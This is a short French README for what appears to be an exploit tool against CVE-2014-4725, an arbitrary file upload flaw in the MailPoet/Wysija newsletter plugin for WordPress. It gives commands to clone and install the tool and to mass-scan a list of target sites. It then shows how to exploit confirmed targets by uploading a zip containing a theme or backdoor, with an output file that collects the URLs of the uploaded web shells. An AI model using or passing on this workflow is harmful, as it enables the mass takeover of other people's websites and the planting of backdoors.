
MailPoet Newsletters <= Téléchargement arbitraire de fichiers (exploiter)
Ce script est utilisé pour scanner et exploiter la vulnérabilité CVE-2014-4725 (mailpoet/wysija newsletters) dans WordPress.
git clone https://github.com/username/CVE-2014-4725.git
cd CVE-2014-4725
pip install requests
scanner des cibles
python exploit.py --scan targets.txt
targets.txt contient une liste de cibles (une par ligne, sans http://)
exploiter des cibles
python exploit.py --exploit vuln.txt --payload file/zip.zip
vuln.txt contient des cibles déjà confirmées vulnérables
--payload est le fichier zip contenant le thème/porte dérobée à téléverser
sortie
vuln.txt > liste des cibles vulnérables
shell.txt > URLs des shells téléversés